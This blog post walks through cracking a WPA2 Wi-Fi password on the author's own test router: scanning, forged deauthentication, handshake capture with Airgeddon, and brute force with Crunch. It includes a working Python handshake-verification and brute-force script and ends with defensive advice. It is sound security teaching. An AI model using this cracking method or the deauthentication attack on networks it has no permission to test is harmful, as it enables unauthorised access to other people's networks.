Wi-Fi Attacks – Cracking the Handshake

Introduction

When plug-and-play wireless technology was introduced to the mainstream, it changed how we connect to the internet at work and at home. It allowed even those with limited technical knowledge and skills to get set up, connected, and online in minutes.

While Wi-Fi is incredibly convenient, it carries real risks that users aren't always aware of. We take for granted that Wi-Fi is a conduit to getting online, but it is often overlooked that it also connects every device on the same network to every other. A rogue device on that network could use this to compromise other devices, intercept passwords, or steal personal data.

With the recent rise in attacks against Critical National Infrastructure organisations, it is worth noting that, alongside their use in homes and workplaces, Wi-Fi devices are sometimes used in industrial environments to bridge wide areas where a physical connection cannot feasibly be installed. If these links are not adequately secured and monitored, they can give a malicious individual easy access to critical networks.

In many cases the convenience of Wi-Fi networks means that basic security and due diligence are overlooked.

In this post I want to run through a pen testing tool for cracking Wi-Fi networks, and highlight the steps that need to be considered to protect against these types of attacks.


Objectives

The objectives of this post are to demonstrate the principles behind how wireless networks work, how they can be hacked, and what needs to be done to defend them.

There are several different techniques that can be used to target Wi-Fi networks, from physical access attacks to social engineering. In this post I'm going to focus on one specific attack, capturing a WPA/WPA2 handshake and brute forcing it, which can be performed over the air from within radio range without any physical access to the network.


The Setup

It goes without saying that attempting to interfere with any Wi-Fi network that’s not your own is a bad idea, and that you should only practice on your own hardware.

For the purpose of this test I’ve set up a small controlled environment with a dedicated mini TP Link router, with no other devices connected, or access to the internet – a perfect target for testing the attack without interfering with anyone else.

To run the attack itself I will be using a virtualized instance of Kali Linux, together with an external USB wireless adapter that supports monitor mode and packet injection (an Alfa Network adapter); both capabilities are required for the capture and deauthentication steps below.

For the test, the Wi-Fi router's password has been set to 12345670. Eight characters is the minimum WPA/WPA2 passphrase length, and an all-numeric password of that length is one of the weakest choices possible, but it will work for demonstrating the attack and the underlying principles.



Cracking the Handshake – The (short) Theory.

This attack works by taking advantage of how client devices and a router (access point) authenticate each other and establish session keys on WPA/WPA2 networks that use a pre-shared key. This process is known as the 4-way handshake.

In this type of attack, the attacker forces all clients to disconnect from the router, and when they automatically reconnect (the default behaviour for client devices), the attacker captures the handshake. The handshake never contains the password itself, only values derived from it, but that is enough: it can then be attacked offline, with no further contact with the network, to recover the Wi-Fi password.

There are four key stages to this attack:

  1. Scanning – Identify the target network.
  2. De-authentication – Kick the clients off the network.
  3. Capturing the handshake – As the clients reconnect, the 4-way handshake is exchanged and captured.
  4. Cracking – The captured 4-way handshake is attacked offline to recover the plaintext Wi-Fi password.


Cracking the Handshake – In Practice.

Introducing the Tools - Airgeddon

For the purpose of this post, I’ll be using a Wi-Fi auditing and Wi-Fi penetration testing framework, called Airgeddon.

Airgeddon is a bash script that provides a command line interface to a number of different Wi-Fi testing and auditing tools. The benefit of Airgeddon is that it streamlines the process of capturing and cracking wireless network credentials – whilst still requiring the user to understand the underlying processes and technologies.

Airgeddon isn't included in the standard Kali Linux tool set, but it can be found here.



Scanning

After starting the Airgeddon framework, the first thing that is needed is to scan for and identify the network we want to target.

This is done by putting the wireless adapter into monitor mode, which lets it passively receive every 802.11 frame in range rather than only those addressed to it. From there we can effectively listen to all the Wi-Fi traffic in our surroundings, including the beacons that access points broadcast.

Below is the result of a quick scan, showing my active TP Link router.


The scan shows us:

  • The router's MAC address (BSSID)
  • The network name we are more familiar with (ESSID)
  • The security protocol and cipher the network uses, for example WPA2 with CCMP (ENC / CIPHER); a pre-shared-key network of this kind is what the attack targets
  • The received signal strength (PWR), a rough indication of how close the router is to the wireless adapter
  • A count of data frames seen (#Data), which indicates that at least one client is connected and active

From here we have everything needed to start the process.


Deauthenticating and Capture

As mentioned above, the 4-way handshake is the process by which a client and router establish a secure, encrypted channel. Crucially, neither side ever transmits the Wi-Fi password. Both derive the same Pairwise Master Key (PMK) from the passphrase and the network name (ESSID) using PBKDF2 with 4096 iterations of HMAC-SHA1. They then exchange random nonces (ANonce from the router, SNonce from the client) and, from the PMK, the nonces and the two MAC addresses, derive a session key (PTK). Each side proves it holds the correct PMK by attaching a Message Integrity Code (MIC), computed with part of the PTK, to its handshake frames. Once both MICs check out, the router grants access to the network.

In this stage, our attack is looking to capture this 4-way handshake. Because the frames contain the nonces, the MAC addresses and the MIC, an attacker can later test password guesses offline: compute the PMK for a guess, derive the PTK, recompute the MIC and compare it with the captured one.

To do this, we need to force the connected client (in this case a phone) to disconnect from the router and then allow it to reconnect. In the process of reconnecting, the phone has to prove (through the 4-way handshake) that it holds the key derived from the correct password before the router will let it back on the network.

The attack works (shown below) by transmitting forged deauthentication frames. These are 802.11 management frames, and on networks without Protected Management Frames (802.11w) they carry no cryptographic protection, so a client that receives one appearing to come from the router's BSSID simply obeys it and disconnects. Sending them in a stream knocks every connected device off the network.


This causes the phone to be temporarily disconnected from the router. Once the deauthentication stops, the phone automatically attempts to reconnect, and in doing so the four EAPOL frames of the handshake are transmitted in the clear and captured by the attacker's adapter in monitor mode.



Cracking the password

Now that the 4-way handshake has been captured, the next stage is to attempt to crack it and reveal the Wi-Fi password. For the purpose of this demonstration a brute force attack will be used: the tool Crunch generates every candidate password in a chosen character set and length, and each candidate is tested against the captured handshake.


Using the brute force method, the initial parameters need to be set to direct the attack. In this case, because the password is already known (12345670), we can shorten the cracking process by instructing the attack to use only numeric characters and a fixed length of eight. A real attacker would not have this knowledge and would have to cover a far larger character set, or use a wordlist, which is exactly why password length and complexity matter.


Crunch incrementally generates the candidates, starting at 00000000 and counting up through all 10^8 possible values to 99999999. For each candidate the cracker derives the PMK (the 4096-iteration PBKDF2 step is what makes each guess expensive), recomputes the handshake MIC and compares it with the one captured; a match means the candidate is the network password. Counting from zero, 12345670 is the 12,345,671st candidate, so only about 12% of the key space had to be searched.


The process took just under 3 hours to identify the correct password, 12345670.
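To make the cracking step concrete, the following is an added Python example, not code from the original post, from Airgeddon or from aircrack-ng, that performs the same per-candidate check an offline cracker does: PBKDF2 to the PMK, PRF-512 to the PTK, HMAC-SHA1 over the EAPOL frame to the MIC, then a comparison with the captured MIC. Because no real capture is available here, `simulate_capture` stands in for the capture step by constructing message 2 of the handshake the way a client that knows the passphrase would; the SSID `TP-LINK_TEST`, the MAC addresses and the nonces are made-up values, and the candidate generator walks a numeric character set in counting order like Crunch.

```python
"""WPA2-Personal handshake verification (added example with constructed inputs)."""
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional

# RSN information element for WPA2-PSK with CCMP, as a client sends it in message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


@dataclass
class Handshake:
    """The pieces of a captured 4-way handshake that an offline cracker needs."""
    ssid: str
    ap_mac: bytes      # BSSID, 6 bytes
    sta_mac: bytes     # client MAC, 6 bytes
    anonce: bytes      # AP nonce from message 1, 32 bytes
    eapol_msg2: bytes  # full EAPOL-Key frame of message 2 (carries SNonce and the MIC)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 iterations are the cost paid for every single candidate guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, truncated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, hs: Handshake, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Its first 16 bytes are the Key Confirmation Key that authenticates EAPOL frames."""
    data = (min(hs.ap_mac, hs.sta_mac) + max(hs.ap_mac, hs.sta_mac)
            + min(hs.anonce, snonce) + max(hs.anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the
    16-byte MIC field (bytes 81..96) zeroed, truncated to 16 bytes."""
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2: key info 0x010a = version 2, pairwise, MIC present."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 0, 1)            # descriptor, key info, key len, replay
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + struct.pack(">H", len(RSN_IE)) + RSN_IE)
    return struct.pack(">BBH", 1, 3, len(body)) + body       # EAPOL version 1, type 3 = Key


def simulate_capture(passphrase: str, ssid: str) -> Handshake:
    """Stand-in for the capture step: a client that knows the passphrase computes the
    message 2 MIC exactly as a real one would. MACs and nonces are constructed values."""
    hs = Handshake(ssid, bytes.fromhex("0013371a2b3c"), bytes.fromhex("02dead00beef"),
                   bytes(range(32)), b"")
    snonce = bytes(range(32, 64))
    kck = derive_kck(derive_pmk(passphrase, ssid), hs, snonce)
    hs.eapol_msg2 = build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))
    return hs


def verify_candidate(hs: Handshake, candidate: str) -> bool:
    """What the cracker does per guess: recompute PMK -> KCK -> MIC and compare.
    The passphrase itself is never in the capture; only this MIC can be checked."""
    snonce = hs.eapol_msg2[17:49]
    kck = derive_kck(derive_pmk(candidate, hs.ssid), hs, snonce)
    return hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.eapol_msg2[81:97])


def numeric_candidates(length: int, start: int = 0, stop: Optional[int] = None) -> Iterator[str]:
    """Zero-padded decimal strings in counting order, the way Crunch walks a numeric charset."""
    stop = 10 ** length if stop is None else min(stop, 10 ** length)
    for n in range(start, stop):
        yield f"{n:0{length}d}"


def crack(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MIC matches the captured one, or None."""
    for candidate in candidates:
        if verify_candidate(hs, candidate):
            return candidate
    return None


if __name__ == "__main__":
    capture = simulate_capture("12345670", "TP-LINK_TEST")  # SSID is an assumption
    # A full Crunch run starts at 00000000; starting nearby keeps this to a few seconds.
    print(crack(capture, numeric_candidates(8, 12345600, 12345700)))
```

The important design point is in `verify_candidate`: nothing in the capture can be decrypted to reveal the password, so the only move available is to guess, pay the PBKDF2 cost, and compare MICs. Every extra character in the passphrase multiplies the number of guesses by the size of the character set, which is why the defence section below leads with password length.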


The Defense

The purpose of showcasing the tool and the underlying principles was to highlight how an attacker could gain access to even a password-protected wireless network.

The convenient nature of Wi-Fi networks often means that security is an afterthought, or that a password is assumed to make the network secure by itself. As the tool and attack showed, the process of cracking a weak Wi-Fi password is straightforward.

In terms of defense, there are a few things that everyone should do (with some of these being routine activities):

  1. Wi-Fi Passwords – Change the default Wi-Fi password to something longer and more complex, ideally generated by a password manager or a reputable random password generator. A longer, more varied password increases the time an attacker needs to crack a captured handshake, and the growth is exponential: an 8-digit numeric password has 10^8 possibilities, while a 12-character mixed-case alphanumeric one has 62^12, roughly 3 x 10^21. If your router and devices support WPA3, enable it; its SAE handshake is designed so that a captured exchange cannot be brute forced offline in this way.
  2. Asset Review – Routinely go into your router's admin console and look at the connected devices (instructions can be found for each router online). Review the device names and MAC addresses and look for anything unusual or unfamiliar that might indicate an unauthorized device. If in doubt, change the Wi-Fi password; this disconnects all devices and lets you re-admit only the ones you know.
  3. Implement Whitelisting – MAC address whitelisting tells the router to accept only the MAC addresses of the devices you want on the network. It is a weak control on its own, because an attacker in monitor mode can see the MAC addresses of legitimate clients and spoof them, but it adds a layer of protection and, on routers that log rejected associations, gives you a record of unlisted devices attempting to connect.
  4. Lastly, be aware of the techniques that can be used against you. If a device keeps disconnecting for no apparent reason, it could indicate someone sending deauthentication frames in preparation for this attack. Where your router and clients support it, enable Protected Management Frames (802.11w), which makes clients ignore the forged deauthentication frames the attack relies on. If you see this type of activity, keep an eye on the assets connected to the network and change your password to something longer and more complex, since any handshake already captured will be attacked against the old one.





Brooke Johnston

Marketing Manager APAC/Africa

3 years ago

I feel like I need to secure my network more after reading this! Thanks James


More articles by James Weston